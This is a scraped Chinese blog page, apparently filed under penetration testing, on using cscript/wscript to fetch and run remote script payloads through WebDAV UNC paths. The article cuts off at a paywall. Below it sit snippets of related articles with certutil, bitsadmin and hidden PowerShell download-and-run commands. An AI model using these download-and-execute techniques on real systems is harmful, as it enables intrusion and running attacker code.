Windows文件传输及执行—Cscript/Wscript

最新推荐文章于 2023-03-29 17:38:58 发布
最新推荐文章于 2023-03-29 17:38:58 发布
阅读量915 收藏
点赞数
分类专栏: 渗透测试 # Windows文件传输及执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27828281/article/details/103571317
版权

声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。

 取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>

使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

 在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。

Cscript/Wscript下载&执行

执行远程vbs脚本的基本命令格式为:

cscript //E:jscript \\webdavserver\folder\payload.txt

网络调用进程:svchost.exe,payload位置:WebDav客户端本地缓存。
此外,也可以利用powershell执行vbs脚本,首先生成Empire的vbs payload࿱

最低0.47元/天 解锁文章
h8x0r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows脚本手册
03-21
四、Windows脚本宿主(WScript/CScript) WScript和CScriptWindows脚本宿主的两个执行引擎,它们负责解释和运行VBS或JS等脚本。WScript提供了一个图形用户界面(GUI)来运行脚本,而CScript则以命令行方式运行,...
在本机运行vbs, 让远程计算机启动一个程序
人生路上漫悠悠,程序写春秋...
03-02 7313
使用WMI,MSDN上有个例子可以看一下,在本机运行vbs, 让远程计算机启动一个程序。http://msdn.microsoft.com/en-us/library/aa389388(VS.85).aspx 程序名:RemoteRunProgram.vbs  Const SW_NORMAL = 1strComputer = "."strCommand = "Notep
cmd 环境下载文件的几种方法
小橙子的博客
03-09 2993
0x01 certutil certutil 是一个证书工具,功能挺丰富的,参数非常多 certutil -urlcache -split -f http://xxxxxx certutil -urlcache -split -f https://xxxxxx 1.txt #指定保存文件名 0x02 bitsadmin bitsadmin /transfer n http://...
VBS中运行应用程序的两种方式及WshShell对像浅析
weixin_30851409的博客
12-16 166
vbs中有两种方法运行一个指定的应用程序:1. 使用wshShell对象提供的run()方法执行:Set wshell=CreateObject("WScript.Shell") wshell.Run """C:\Program Files\360\360se3\360se.exe""",0,True Set wshell = Nothing 2. 使用w...
如何在远程系统执行程序
Ms08067安全实验室
12-18 879
序言在我们获得用户名口令后,尝试远程登陆目标主机并执行程序,结合实际环境做了如下测试.目标远程登陆目标主机执行测试程序测试环境远程主机:ip:192.168.40.137 用户名:...
Vbs脚本编程简明教程之四—如何利用Vbs运行外部程序?
靖海安澜阁
07-16 5516
Vbs只提供了编程的一个基本框架,用户可以使用Vbs来定义变量、过程和函数,vbs也提供了一些内部函数和对象,但是Vbs没有提供任何命令来访问Windows系统内部的部件,但是值得庆幸的是,Vbs虽然不能自己完成这些任务,但是它提供了一条极为方便、功能也相当强的命令——CreateObject,这条命令可以访问windows系统内安装的所有com对象,并且可以调用这些部件中存放的命令。于是问题
Windows 脚本编程核心技术精解.rar
10-07
- VBScript广泛应用于Windows系统管理和自动化,如通过`WScript.Shell`对象执行外部命令,`FileSystemObject`处理文件和目录。 - JScript与JavaScript类似,但在Windows环境下使用,提供与VBScript相同的功能。 3...
WINDOWS脚本技术
11-17
- **网络管理**:远程控制、文件传输、网络监控。 - **应用程序集成**:将不同程序的功能整合到一个脚本中。 - **用户界面自动化**:模拟用户操作,如点击按钮、填写表单等。 6. **学习与开发** 学习Windows...
Windows 脚本技术
07-17
VBScript也可以与WScript或CScript一起使用,实现系统级别的脚本执行。 3. **PowerShell** PowerShell是微软推出的一种更加强大的命令行环境和脚本语言,主要用于系统管理。它不仅包含传统的DOS命令,还引入了...
VBS获取桌面文件,并上传FTP
06-09
Windows环境中,VBScript可以通过WScript或CScript执行,用于创建批处理脚本、网页交互以及其他自动化任务。在本例中,`upload.vbs`文件就是使用VBScript编写的脚本。 在描述中提到的“获取桌面文件”,VBS可以...
使用VBS实现SSH远程登录并自动执行命令
weixin_30339457的博客
03-29 2127
set ws=createobject("wscript.shell")ws.run "Putty所在路径\putty.exe -ssh -pw 你的密码用户名@192.168.168.10" ‘打开 Putty 并登录wscript.Sleep 2000 ‘等待 2 秒 ws.AppActivate "192.168.168.10" ‘激活窗口wscript.Sl...
渗透测试之内网渗透远程程序执行小技巧
Blood_Pupil的博客
07-01 1002
本文介绍一些渗透测试环境中经常使用到的小技巧 IPC NLTM认证 ? HASH注入很强大? wce_hash注入 IPC管道执行命令 依赖于Task scheduler Wmic 依赖于135端口 Wmic是Windows Management Instrumentation的缩写,即Windows管理工具。通过Wmic可以查询系统信息并且可以在目标系统创建进程,如下图所示(因为当前计算机...
脚本连接远程桌面
chengyaosou0528的博客
07-11 1790
1. 第一次远程连接 第一次远程连接服务器稍微比较麻烦,需要设置服务器ip地址, 用户名, 密码, 共享磁盘等信息. 只要设置完成之后, 以后再连接时就比较简单了. 1.1 打开运行窗口 使用 windows 键 + R 打开运行窗口, 输入mstsc, 点确定 1.2 输入服务器ip 和用...
VBS学习日记(三) 运行外部程序
仒雨的专栏
07-15 2895
利用 Vbs 运行外部程序
Windows远程执行代码
lingmessy的博客
04-09 1264
远程执行代码 Windows远程下载文件到本地并执行 cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://127.0.0.1:8089','notepad.exe');start-...
VBS脚本自动化-利用Windows远程连接Linux虚拟机并批量修改某配置文件信息
秋不溜秋的博客
03-29 954
Visual basic script 的自动化脚本案例。需要对一批Linux虚拟机的配置文件A进行配置信息修改,同时有一行配置信息要求根据IP信息改变而改变
Vbs 运行外部程序
leechoy
08-14 4741
**Vbs 只提供了编程的一个基本框架,用户可以使用 Vbs 来定义变量、过程和函数, vbs也提供 了一些内部函数和对象,但是 Vbs 没有提供任何命令来访问 Windows 系统内部的部件 ,但是值 得庆幸的是, Vbs 虽然不能自己完成这些任务, 但是它提供了一条极为方便、功能也相当强的 命令—— CreateObject,这条命令可以访问 windows 系统内安装的所有 com 对象,并...
命令行/终端下载指令大全
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
11-15 410
1. 简介在我们渗透测试的过程中,通常会需要向目标主机传送一些文件,来达到提权,维持控制等目的。因此当不方便进行直接传输时,同时目标主机是能有网络连接的,那么此时就可以通过本地下载这种方法来达到文件传输的目的。此篇文章,我会对互联网上针对 win 与 linux 大部分的下载指令来做一个汇总,可能会有疏漏,但汇总的都是经常会用的。2. Linux2.1 Wget这款工具功能很丰富,可以充当某种功能...
cscript和wscript之间的区别
cunchi8090的博客
07-20 1176
Windows Script Host (WSH) has been part of Windows since Windows NT4. Windows Script Host provides architecture for building dynamic scripts that consist of a core object model, scripting hosts, and s...
运行 for /F %a in (cscript //Nologo 111.vbs) do (set yesterday=%a echo d echo ) 报错:系统找不到文件 cscript。如何解决
最新发布
07-13
cscriptWindows 系统中用于执行 VBScript 脚本的命令行工具。 要解决这个问题,您可以尝试以下几种方法: 1. 检查 cscript 是否安装:首先,您可以尝试在命令提示符窗口中直接运行 cscript 命令,看看是否能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值